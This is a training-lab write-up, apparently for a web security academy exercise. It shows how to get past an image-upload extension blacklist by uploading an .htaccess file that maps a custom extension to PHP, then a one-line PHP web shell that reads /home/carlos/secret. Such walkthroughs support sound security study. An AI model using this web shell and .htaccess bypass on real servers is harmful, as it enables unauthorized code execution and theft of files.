8.4 Lab: Web shell upload via extension blacklist bypass | 2024
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner | Karthikeyan Nagaraj
Description
This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret
. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Solution
- Log in to your Account with
wiener:peter
- Turn on the Proxy and upload
shell.php
which contains the below code<?php echo file_get_contents(‘/home/carlos/secret’); ?>
- Send the request to Repeater and change the below values,
Remove the Payload,
filename=”.htaccess” ,
Content-Type: text/plain ,
Add the header -AddType application/x-httpd-php .shell
- Send the request, undo the changes, and send the same request by replacing the filename to
shell.shell
- Now, go to My-Account, refresh the page, Right-click the Image, and Click
Open Image in New Tab
- Copy the Secret code and paste it in the Solution to solve the Lab
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng